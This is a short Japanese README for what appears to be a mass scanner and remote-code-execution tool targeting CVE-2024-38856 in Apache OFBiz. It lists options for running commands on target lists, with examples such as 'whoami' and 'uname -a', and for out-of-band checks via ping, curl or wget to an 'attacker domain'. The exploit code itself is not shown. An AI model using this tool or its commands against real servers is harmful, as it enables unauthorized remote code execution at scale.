
大規模なApache OFBizゼロデイスキャナーとRCEを実行する
このスクリプトは、Apache OfbizアプリケーションにおけるCVE-2024-38856脆弱性をスキャンするために設計されています。この脆弱性はリモートコード実行を可能にする可能性があります。このスクリプトは、悪意のあるペイロードを含むHTTP POSTリクエストをOfbizアプリケーション内の特定のパスに送信して脆弱性を悪用します。

coloredlogsを使用しますrequestscoloredlogscoloramaargparseurllib3必要な依存関係はpipを使用してインストールできます:
pip install requests coloredlogs colorama argparse urllib3
スクリプトを実行するには、次のコマンドを使用します:
python script_name.py [options]
-t, --threads: 使用するスレッド数(デフォルト: 1)-p, --port: ターゲットポート-c, --command: 実行するコマンド-s, --scan: ping、curl、wgetを使用したスキャンを実行-d, --domain: ping、curl、wgetでスキャンするドメイン(攻撃者ドメイン)-f, --file: http(s)://target,port形式のターゲットリストを含むファイルコマンドでターゲットをスキャン:
python script_name.py -f targets.txt -c "whoami"
python script_name.py -s -d example.com -p 80
python script_name.py -f targets.txt -c "uname -a"